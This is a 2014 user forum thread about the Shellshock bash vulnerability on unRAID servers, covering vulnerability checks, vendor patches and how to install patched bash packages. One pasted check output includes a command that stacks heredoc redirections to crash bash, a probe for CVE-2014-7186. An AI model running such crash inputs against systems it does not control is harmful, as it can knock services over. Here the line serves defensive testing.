mygoogoo Posted September 25, 2014 Share Posted September 25, 2014 Perhaps we have another vulnerability.... http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/ I performed the test on unRAID 6.0-Beta9 as described in the article, and it seems to be affected. Not sure if this a big deal with unRAID and how it is used. Quote Link to comment
WeeboTech Posted September 25, 2014 Share Posted September 25, 2014 You have to consider that anything which takes user input and defines an environment variable is vulnerable. Then consider how much helpful shell script code people provide here, plus the fact that it runs as root. We're really already vulnerable to a malicious programmed intent. The issue with this particular situation is that user input from an external program could be coerced into running something that wasn't intended. so in summary. 1. If you accept external scripts and run them as root, you are already vulnerable (although you can audit these scripts). 2. Any external input, especially from the internet, makes you more vulnerable 'even if you audit' 3. This is fuel for script kiddes to exploit 4. Your older hardware devices that run linux or bash of some sort have this bug also. My recommendation would be for limetech to plug it. There's an update on slackware already. For those who want to take matters into their own hands, you can download the slackware bash update and put it in your /extras folder. While this does replace bash, any copies already running in memory will not get replaced. Only future invocations. Quote Link to comment
MSattler Posted September 25, 2014 Share Posted September 25, 2014 Perhaps we have another vulnerability.... http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/ I performed the test on unRAID 6.0-Beta9 as described in the article, and it seems to be affected. Not sure if this a big deal with unRAID and how it is used. If you limit access to the unraid server it should not be a big deal, but any additional plugins/docker apps could make it more vulnerable. Quote Link to comment
limetech Posted September 25, 2014 Share Posted September 25, 2014 beta10 has the latest "shellshock" patch incorporated, but, as with heartbleed, it won't be the last one as the vulnerability is completely vetted. You can follow the discussion here: http://seclists.org/oss-sec/2014/q3/index.html#654 This is mainly an issue only for internet-facing servers. Note: I will be moving this thread to "Announcements". Quote Link to comment
Frank1940 Posted September 25, 2014 Share Posted September 25, 2014 Limetech, I realize that this is probably not something which is a major security item for most of us who are using version 5.0.5 but there does exist some risk. Are there any plans to release either a version 5.0.6 with just the upgrade Bash shell or the new BASH shell with directions to instructions of how to install it in existing 5.0.5 installations? Quote Link to comment
RobJ Posted September 28, 2014 Share Posted September 28, 2014 There is now a Bash vulnerability check script, attached. Copy it to your flash drive, without the .txt extension. On testing it on my current UnRAID v5.0.5, early version of it produced: root@JacoBack:~# cd /boot root@JacoBack:/boot# bashcheck Vulnerable to CVE-2014-6271 (original shellshock) Vulnerable to CVE-2014-7169 (taviso bug) ./bashcheck: line 18: 4777 Segmentation fault (core dumped) bash -c "true $(printf '<<EOF %.0s' {1..79})" 2> /dev/null Vulnerable to CVE-2014-7186 (redir_stack bug) Test for CVE-2014-7187 not reliable without address sanitizer Variable function parser still active, likely vulnerable to yet unknown parser bugs like CVE-2014-6277 (lcamtuf bug) root@JacoBack:/boot# Not a pretty sight. Perhaps others could test it on the current v6.0-beta9, and the soon coming -beta10. I do NOT see this as a serious problem though, if you keep your server off the Internet and NEVER try unvetted scripts. Of course, as a DOS/Windows based user like many others here, I have never and will never allow my server to be open to the Internet, unless in the future I load a reputable Linux distro in a VM. I do not consider myself a sufficiently experienced Linux user. I also will never download scripts from the Web unless they have been vetted by experienced and trusted UnRAID users. Edit: updated the attached bashcheck script; to be sure of latest, use link in Tom's post, following this one. Edit2: gave up trying to attach current bashcheck, as it is currently updated several times a day. Please go to https://github.com/hannob/bashcheck to download the latest version. Quote Link to comment
limetech Posted September 28, 2014 Share Posted September 28, 2014 There is now a Bash vulnerability check script, attached. Copy it to your flash drive, without the .txt extension. Where did you find that? EDIT: nevermind, found it: https://github.com/hannob/bashcheck On -beta10, which has latest patch produced yesterday it yields: Not vulnerable to CVE-2014-6271 (original shellshock) Not vulnerable to CVE-2014-7169 (taviso bug) Vulnerable to CVE-2014-7186 (redir_stack bug) Test for CVE-2014-7187 not reliable without address sanitizer Variable function parser still active, likely vulnerable to yet unknown parser bugs like CVE-2014-6277 (lcamtuf bug) Quote Link to comment
zoggy Posted September 29, 2014 Share Posted September 29, 2014 fyi, i had to update my bash again today to finally get it to pass that bashcheck script. Quote Link to comment
Frank1940 Posted September 29, 2014 Share Posted September 29, 2014 fyi, i had to update my bash again today to finally get it to pass that bashcheck script. How are you installing it? I believe that the old vulnerable version is what is in the 5.0.5 built. I am reasonably sure you can install a non-vulnerable version of Bash into a current running unRAID system, but that installation will not survive a reboot. It probably takes one or more line(s) of code in the 'go' script to do that. Quote Link to comment
BRiT Posted September 29, 2014 Share Posted September 29, 2014 fyi, i had to update my bash again today to finally get it to pass that bashcheck script. How are you installing it? I believe that the old vulnerable version is what is in the 5.0.5 built. I am reasonably sure you can install a non-vulnerable version of Bash into a current running unRAID system, but that installation will not survive a reboot. It probably takes one or more line(s) of code in the 'go' script to do that. I think you can place the fixed version of the Bash Slackware package (tgz / txz) in the /boot/extras directory and it will be installed without any lines added in the go or stop scripts. Quote Link to comment
Frank1940 Posted September 29, 2014 Share Posted September 29, 2014 fyi, i had to update my bash again today to finally get it to pass that bashcheck script. How are you installing it? I believe that the old vulnerable version is what is in the 5.0.5 built. I am reasonably sure you can install a non-vulnerable version of Bash into a current running unRAID system, but that installation will not survive a reboot. It probably takes one or more line(s) of code in the 'go' script to do that. I think you can place the fixed version of the Bash Slackware package (tgz / txz) in the /boot/extras directory and it will be installed without any lines added in the go or stop scripts. Have you done this? Do you have a link to the website that contains the updated package that would work in ver5.0.5? Quote Link to comment
limetech Posted September 29, 2014 Share Posted September 29, 2014 Have you done this? Do you have a link to the website that contains the updated package that would work in ver5.0.5? You can get latest bash security patches here:http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.559646 But do you have your unRaid server directly facing the internet? If not, do hackers have access to your private LAN where your unRaid server is connected? If answer to these is Yes, then maybe you need to update. If No, then no need. Same with heartbleed. Quote Link to comment
Frank1940 Posted September 29, 2014 Share Posted September 29, 2014 Have you done this? Do you have a link to the website that contains the updated package that would work in ver5.0.5? You can get latest bash security patches here:http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.559646 Would this be the correct file and location to get it? ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bash-4.1.014-i486-1_slack13.1.txz And would one install it by just placing it in the /boot/extras directory and rebooting? Quote Link to comment
switchman Posted September 29, 2014 Share Posted September 29, 2014 I also would like to know which version is the correct version for 5.05 and how to install it. Quote Link to comment
RobJ Posted October 2, 2014 Share Posted October 2, 2014 I gave up trying to keep my post above updated with the latest version of the bashcheck script. It is currently being updated several times a day, with significant changes. For latest copy, go to https://github.com/hannob/bashcheck. Quote Link to comment
zoggy Posted October 4, 2014 Share Posted October 4, 2014 can just grab latest by doing: wget "https://raw.githubusercontent.com/hannob/bashcheck/master/bashcheck" Quote Link to comment
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.